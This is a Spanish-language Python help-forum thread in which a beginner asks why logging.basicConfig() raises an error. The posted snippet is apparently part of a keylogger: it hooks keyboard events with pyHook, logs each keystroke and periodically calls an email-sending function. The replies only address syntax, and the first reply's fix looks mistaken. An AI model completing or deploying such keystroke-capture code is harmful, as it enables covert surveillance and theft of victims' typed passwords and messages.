Python - error en logging.basicConfig()

 
Vista:

error en logging.basicConfig()

Publicado por rodrigo galvez pinto (1 intervención) el 15/10/2018 05:51:45
Ayuda por favor Necesito compila este código
1
2
3
4
5
6
7
8
9
10
11
12
13
14
def OnKeyboardEvent(event):
    logging.basicConfig(filename=file_log, level=logging.DEBUG,
    format = '%(messaje)s')                           # --------------------------------------Aqui me da Error soy novato aun....
    logging.log(10, chr(event.Ascii))
    return True
hooks_manager pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboardEvent()
 
while True:
    if TimeOut():
        FormatAndSendEmail()
        timeout = time.time() + wait_seconds
        pythoncom.PumpWaitingMessages()
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder
Imágen de perfil de abZer0x
Val: 425
Bronce
Ha mantenido su posición en Python (en relación al último mes)
Gráfica de Python

error en logging.basicConfig()

Publicado por abZer0x (109 intervenciones) el 15/10/2018 22:52:58
Tenes un paréntesis que sobra, solamente bórralo.
1
format = '%(messaje)s') <---
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar
Imágen de perfil de kip
Val: 1.120
Bronce
Ha mantenido su posición en Python (en relación al último mes)
Gráfica de Python

error en logging.basicConfig()

Publicado por kip (257 intervenciones) el 16/10/2018 03:53:09
Hola, el error te lo da por uno de los argumentos que envias al metodo, filename=file_log para ser exacto, si te vas a la documentación encontraras que debes pasarle un nombre de un archivo(este va a ser creado a partir de FileHandler) para que pueda guardarse alli todo lo que vayas a querer registrar con el modulo logging.

En tu caso estas colocando file_log haciendo referencia a una variable que no existe, posiblemente puedas probar con 'myapp.log' y debería funcionarte.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar